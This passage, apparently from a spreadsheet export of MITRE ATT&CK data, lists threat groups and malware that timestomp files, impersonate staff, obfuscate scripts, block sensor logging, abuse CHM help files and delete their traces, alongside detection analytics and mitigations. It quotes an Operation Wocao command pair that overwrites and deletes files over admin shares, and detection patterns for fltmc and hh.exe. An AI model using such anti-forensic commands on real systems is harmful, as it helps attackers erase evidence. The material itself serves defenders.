[Chimera](https://attack.mitre.org/groups/G0114) has used a Windows version of the Linux &lt;code&gt;touch&lt;/code&gt; command to modify the date and time stamp on DLLs.(Citation: NCC Group Chimera January 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has manipulated timestamps for creation or compilation dates to defeat anti-forensics.(Citation: Cybereason Kimsuky November 2020)
Lazarus Group
Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee GhostSecret)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)	
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) used timestomping to modify the $STANDARD_INFORMATION attribute on tools.(Citation: FireEye TRITON 2019)
3PARA RAT
[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to set certain attributes such as creation/modification timestamps on files.(Citation: CrowdStrike Putter Panda)
Attor
[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has modified file and directory timestamps.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) modifies the time of a file as specified by the control server.(Citation: McAfee Bankshot)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.(Citation: Crowdstrike Indrik November 2018)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can change the timestamp of files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.(Citation: NCSC Cyclops Blink February 2022)
Derusbi
The [Derusbi](https://attack.mitre.org/software/S0021) malware supports timestomping.(Citation: Novetta-Axiom)(Citation: Fidelis Turbo)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) has changed the creation date of files.(Citation: Prevailion EvilNum May 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) performs timestomping of a CAB file it creates.(Citation: Lotus Blossom Jun 2015)
Empire
[Empire](https://attack.mitre.org/software/S0363) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: Github PowerShell Empire)
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) can modify file or directory timestamps.(Citation: US-CERT FALLCHILL Nov 2017)
Gazer
For early [Gazer](https://attack.mitre.org/software/S0168) versions, the compilation timestamp was faked.(Citation: ESET Gazer Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to perform timestomping of files on targeted systems.(Citation: ESET Gelsemium June 2021)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) samples were timestomped by the authors by setting the PE timestamps to all zero values. [InvisiMole](https://attack.mitre.org/software/S0260) also has a built-in command to modify file times.(Citation: ESET InvisiMole June 2018)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) time-stomped its DLL in order to evade detection.(Citation: PWC KeyBoys Feb 2017)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can modify timestamps of replaced files, such as &lt;code&gt;ssh&lt;/code&gt; with the added credential stealer or &lt;code&gt;sshd&lt;/code&gt; used to deploy [Kobalos](https://attack.mitre.org/software/S0641).(Citation: ESET Kobalos Jan 2021) 
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has the capability to create and modify file timestamps.(Citation: ESET DazzleSpy Jan 2022)
Misdat
Many [Misdat](https://attack.mitre.org/software/S0083) samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.(Citation: Cylance Dust Storm)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can modify the Creation, Access, and Write timestamps for malicious DLLs to match those of the genuine Windows DLL user32.dll.(Citation: MoustachedBouncer ESET August 2023)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use the &lt;code&gt;touch -t&lt;/code&gt; command to change timestamps.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) has a command to timestop a file or directory.(Citation: Dell TG-3390)
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.(Citation: FireEye POSHSPY April 2017)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) has the ability to timestomp a file.(Citation: Unit 42 PingPull Jun 2022)
PowerStallion
[PowerStallion](https://attack.mitre.org/software/S0393) modifies the MAC times of its local log files to match that of the victim's desktop.ini file.(Citation: ESET Turla PowerShell May 2019)
Psylo
[Psylo](https://attack.mitre.org/software/S0078) has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.(Citation: Scarlet Mimic Jan 2016)
SEASHARPEE
[SEASHARPEE](https://attack.mitre.org/software/S0185) can timestomp files on victims using a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)	
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) extracts and writes driver files that match the times of other legitimate files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can change the timestamp of specified filenames.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
TDTESS
After creating a new service for persistence, [TDTESS](https://attack.mitre.org/software/S0164) sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.(Citation: ClearSky Wilted Tulip July 2017)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.(Citation: ESET Sednit USBStealer 2014)
Winnti for Windows
[Winnti for Windows](https://attack.mitre.org/software/S0141) can set the timestamps for its worker and service components to match that of cmd.exe.(Citation: Novetta Winnti April 2015)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can change the `CreationTime`, `LastAccessTime`, and `LastWriteTime` file time attributes when executed with `SYSTEM` privileges.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Review and monitor email and other user communication logs for signs of impersonation, such as suspicious emails (e.g., from known malicious or compromised accounts) or content associated with an adversary's actions on objective (e.g., abnormal monetary transactions).
Threat Intelligence Program
Threat intelligence helps defenders and users be aware of and defend against common lures and active campaigns that have been used for impersonation.
User Training
Train users to be aware of impersonation tricks and how to counter them, for example confirming incoming requests through an independent platform like a phone call or in-person, to reduce risk.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) impersonated legitimate IT personnel in phone calls and text messages either to direct victims to a credential harvesting site or getting victims to run commercial remote monitoring and management (RMM) tools.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: The Hacker News Lazarus Aug 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has called victims' help desk and impersonated legitimate users with previously gathered information in order to gain access to privileged accounts.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.
Process Creation
Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious. Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious.
Disable or Remove Feature or Program
Specific developer utilities may not be necessary within a given environment and should be removed if not used.
Execution Prevention
Certain developer utilities should be blocked or restricted if not required.
</t>
  </si>
  <si>
    <t xml:space="preserve">Host Status
Monitor logging, messaging, and other artifacts highlighting the health of host sensors (e.g., metrics, errors, and/or exceptions from logging applications), especially correlating and comparing centralized telemetry against potentially suspicious notifications presented on individual systems.
Process Creation
Consider monitoring for suspicious processes that may be spoofing security tools and monitoring messages.
Execution Prevention
Use application controls to mitigate installation and use of payloads that may be utilized to spoof security alerting.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., `^`).
Also monitor command-lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding.
File Metadata
Scripts containing obfuscated content may have higher entropy of characters/strings.
Script Execution
Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., `^`).
Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.
Antivirus/Antimalware
Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. 
Behavior Prevention on Endpoint
On Windows 10+, enable Attack Surface Reduction (ASR) rules to block execution of potentially obfuscated scripts.(Citation: Microsoft ASR Obfuscation)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used Base64 to encode their PowerShell scripts.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used encoded PowerShell commands.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran encoded commands from the command line.(Citation: Talos Frankenstein June 2019)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.(Citation: FoxIT Wocao December 2019)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used Base64 to obfuscate executed commands.(Citation: FireEye APT19)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: Cybereason Cobalt Kitty 2017)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has encoded PowerShell commands in Base64.(Citation: CrowdStrike AQUATIC PANDA December 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has encoded PowerShell commands.(Citation: Cycraft Chimera April 2020)	
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4.(Citation: Talos Cobalt Group July 2018)(Citation: Morphisec Cobalt Gang Oct 2018)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has obfuscated malicious scripts to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used environment variables and standard input (stdin) to obfuscate command-line arguments. [FIN8](https://attack.mitre.org/groups/G0061) also obfuscates malicious macros delivered as payloads.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Bitdefender FIN8 July 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has base64 encoded scripts to avoid detection.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has executed base64 encoded PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used obfuscated or encrypted scripts.(Citation: ESET Gamaredon June 2020)(Citation: Microsoft Actinium February 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used Base64-encoded scripts.(Citation: Kaspersky Lyceum October 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged the BatchEncryption tool to perform advanced batch script obfuscation and encoding techniques.(Citation: MalwareBytes LazyScripter Feb 2021)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) obfuscated scripts that were used on victim machines.(Citation: Symantec Leafminer July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used base64-encoded commands.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has obfuscated a script with Crypto Obfuscator.(Citation: TrendMicro Patchwork Dec 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.(Citation: ESET Telebots Dec 2016)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used base64 encoding for scripts.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used environment variable string substitution for obfuscation.(Citation: Cyber Forensicator Silence Jan 2019)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used base64 encoded PowerShell commands.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used obfuscated variable names in a JavaScript configuration file.(Citation: Unit 42 Valak July 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used encryption (including salted 3DES via [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Out-EncryptedScript.ps1&lt;/code&gt;), random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.(Citation: ESET Turla PowerShell May 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) used Base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service and PowerShell commands.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has obfuscated and randomized parts of the JScript code it is initiating.(Citation: Cybereason Astaroth Feb 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) malicious PowerShell commands can be encoded with base64.(Citation: BitDefender BADHATCH Mar 2021) 
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has also used encoded PowerShell scripts.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) 
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has used Base64 to encode PowerShell commands.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) has encoded its PowerShell commands in Base64.(Citation: Cybereason Cobalt Kitty 2017)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has obfuscated macros within malicious documents to hide the URLs hosting the malware,  CMD.exe arguments, and PowerShell scripts. (Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: ESET Emotet Dec 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) has the ability to obfuscate commands using &lt;code&gt;Invoke-Obfuscation&lt;/code&gt;.(Citation: Github PowerShell Empire)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) executes and stores obfuscated Perl scripts.(Citation: objsee mac malware 2017)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can use Base64 and "junk" JavaScript code to obfuscate information.(Citation: CrowdStrike IceApple May 2022)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has obfuscated scripts with the BatchEncryption tool.(Citation: MalwareBytes LazyScripter Feb 2021)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts.(Citation: ESET LoudMiner June 2019)	
Machete
[Machete](https://attack.mitre.org/software/S0409) has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. [Machete](https://attack.mitre.org/groups/G0095) has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has `pyminifier` to obfuscate scripts.(Citation: Talos PoetRAT October 2020)
PowerPunch
[PowerPunch](https://attack.mitre.org/software/S0685) can use Base64-encoded scripts.(Citation: Microsoft Actinium February 2022)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of ScriptModification modules that compress and encode scripts and payloads.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) was likely obfuscated using `Invoke-Obfuscation`.(Citation: Unit 42 QUADAGENT July 2018)(Citation: GitHub Invoke-Obfuscation)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use obfuscated and encoded scripts.(Citation: Cyberint Qakbot May 2021)(Citation: Trend Micro Black Basta October 2022)
RogueRobin
The PowerShell script with the [RogueRobin](https://attack.mitre.org/software/S0270) payload was obfuscated using the COMPRESS technique in `Invoke-Obfuscation`.(Citation: Unit 42 DarkHydrus July 2018)(Citation: GitHub Invoke-Obfuscation)
SHARPSTATS
[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)
SQLRat
[SQLRat](https://attack.mitre.org/software/S0390) has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.(Citation: Flashpoint FIN 7 March 2019)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) PowerShell scripts can be encrypted with RC4 and compressed using Gzip.(Citation: Bitdefender Sardonic Aug 2021)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has obfuscated scripts used in execution.(Citation: MSTIC NOBELIUM Mar 2021)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) droppers execute base64 encoded [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) obfuscates the macro commands in its initial payload.(Citation: Talos Zeus Panda Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers.
&lt;h4&gt;Analytic 1 - Indicator Blocking - Driver Unloaded&lt;/h4&gt;
&lt;code&gt;fltmc_processes = filter processes where (exe = "fltmc.exe" AND command_line = "*unload*")&lt;/code&gt;
Host Status
Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data. Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018)
Windows Registry Key Modification
To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;
Restrict File and Directory Permissions
Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls.
Software Configuration
Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.
User Account Management
Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls and cannot be manipulated by user accounts.
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to hide memory artifacts and to patch Event Tracing for Windows (ETW) and the Anti Malware Scan Interface (AMSI).(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can hook logging functions so that nothing from the backdoor gets sent to the logging facility.(Citation: ESET Ebury Feb 2014)	
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to set the `HKLM:\SYSTEM\\CurrentControlSet\\Control\\CrashControl\CrashDumpEnabled` Registry key to `0` in order to disable crash dumps.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can hook the &lt;code&gt;ZwOpenProcess&lt;/code&gt; and &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; APIs called by the process of a security product to hide PIDs and TCP records from detection.(Citation: Trend Micro Waterbear December 2019)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) has suppressed all error reporting by calling `SetErrorMode` with 0x8007 as a parameter.(Citation: MalwareBytes WoodyRAT Aug 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps)
File Creation
Monitor presence and use of CHM files, especially if they are not typically used within an environment.
Process Creation
Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for the creation of any HTML Help Executable (&lt;code&gt; hh.exe &lt;/code&gt;) processes. Adversaries may hide malicious code in &lt;code&gt; .chm &lt;/code&gt; compiled help files; whenever a user tries to open one of these files, Windows executes the HTML Help Executable. Therefore, if there are legitimate uses of compiled help files in your environment, this analytic may lead to false positives and will require additional tuning. 
&lt;h4&gt;Analytic 1 - Compiled HTML Access &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
(event_id == "1" OR event_id == "4688") AND 
exe="C:\Windows\syswow64\hh.exe" OR 
exe="C:\Windows\system32\hh.exe") &lt;/code&gt;
Execution Prevention
Consider using application control to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Restrict Web-Based Content
Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019) 
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) leveraged a compiled HTML file that contained a command to download and run an executable.(Citation: Lookout Dark Caracal Jan 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used a CHM payload to load and execute another malicious file once delivered to a victim.(Citation: Palo Alto OilRig May 2016)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Aug 2019)(Citation: Group IB Silence Sept 2018)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses ActiveX objects for file execution and manipulation. (Citation: Cofense Astaroth Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Command Execution
Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
File Metadata
Monitor and investigate attempts to modify ACLs and file/directory ownership.
Process Creation
Monitor for newly executed processes that may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)
Privileged Account Management
Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.
Restrict File and Directory Permissions
Applying more restrictive permissions to files and directories could prevent adversaries from modifying their access control lists. Additionally, ensure that user settings regarding local and remote symbolic links are properly set or disabled where unneeded.(Citation: create_sym_links)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files.
File Deletion
Monitor for unexpected deletion of files from the system
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered. (Citation: Booz Allen Hamilton)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) removed all previously delivered files from a compromised computer.(Citation: ESET Lazarus Jun 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.(Citation: McAfee Honeybee) 
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ &amp; copy \\&lt;IP ADDRESS&gt;\c$\windows\system32\devmgr.dll \\&lt;IP ADDRESS&gt;\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ &amp; del \\&lt;IP ADDRESS&gt;\c$\windows\temp\LMAKSW.ps1`.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) routinely removed their tools, including custom backdoors, once remote access was achieved.(Citation: FireEye SUNBURST Backdoor December 2020)
APT18
[APT18](https://attack.mitre.org/groups/G0026) actors deleted tools and batch files from victim systems.(Citation: Dell Lateral Movement)
